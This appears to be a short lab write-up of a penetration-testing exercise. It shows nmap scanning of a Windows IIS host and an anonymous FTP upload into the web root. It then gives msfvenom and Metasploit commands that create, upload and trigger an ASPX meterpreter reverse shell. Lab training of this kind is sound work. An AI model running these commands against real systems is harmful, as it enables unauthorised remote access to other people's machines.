
Step one: ping host to make sure it’s active: ping 1 Step two: run nmap against host (in this case it doesn’t matter how noisy we are): nmap -v -A -p- 1 3img

So we know there are two services we can start with, anonymous ftp and a windows server on port 80 with option TRACE. It looks like the ftp share is actually in the root of the IIS web server: img2

Based on that information let’s see if we can upload a file and access it via our browser. Let’s try a image. I’m going to download a random one: 3

I’m going to upload: img4

Testing failed. Note, downloading the image from the ftp server and trying to open also fails. img5

Let’s try a text file: img 6 That worked! ![img 7](/Pasted image 20230521185947.png)

Now it’s time to create a reverse shell. Based on what we already saw it needs to be ASPX since it’s in an IIS site.

Execute the following command to create the reverse shell: msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -f aspx > reverse.aspx Upload it to the ftp share: put reverse.aspx

Start a listener to listen for the remote connection. Will be using metasploit at this point. msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST tun0 run

Now navigate to that file in the browser and a connection should be opened. img 8

Inspired from the Windows Privilege Escalation course from TCM Security